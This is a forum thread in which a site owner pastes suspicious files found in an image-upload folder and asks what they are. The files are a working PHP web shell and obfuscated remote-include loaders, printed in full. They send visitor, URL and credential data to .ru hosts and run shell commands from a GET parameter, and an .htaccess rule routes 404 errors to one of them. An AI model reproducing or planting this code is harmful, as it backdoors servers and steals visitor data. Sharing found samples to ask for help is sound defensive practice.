Jump to content

Weird Files Created!


pbjorge12

Recommended Posts

Hey...I'm a little worried about this odd problem that has begun to show up - Can anyone tell me what it means?

Today I went through a folder of mine on my server called uploadedImages that stores images users uploaded. I check the mime type to prevent other files from being added...The strange thing was I found 2 .php files and a .htaccess file in each subfolder (thumb, smallThumb, and Full).

I will include the "full" folder's files...

base.php
[code]<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>
[/code]

Create.php
[code]<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>
[/code]

.htaccess
[code]Options -MultiViews
ErrorDocument 404 //uploadedImages/cover/full/create.php
[/code]

Note: Different file name's with different content were in eac folder...
Note2: The files were created by "nobody" the default apache user...

Is this normal? What is it? What is its purpose?
Link to comment
Share on other sites


if you find that you havent done any valadation on users uploading the correct file exstention then post the upload revelent code.

if you have done that read on!


ok you made me paranoid know what i did 5 min ago is cheek the phpmyadmin for any databases that i didnt no off being mine you should take these steps.

i had no extra ones thank god.

know what i understand is that if a hacker got your mysql deatails then they can use your database for there own needs and in some cases also use a folder you didnt know about but the best pratice is to cheeck the database entrys and if there all yours lol............... your ok you can sleep tonight ok.

but

in the worse sititation and a person has leached onto your database then you have to reset the passwords on all your scripts and database ok.

and then delete any unknown folders and files .

i would sugest a fresh copy of everthink ok.

scary good luck.
Link to comment
Share on other sites

This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.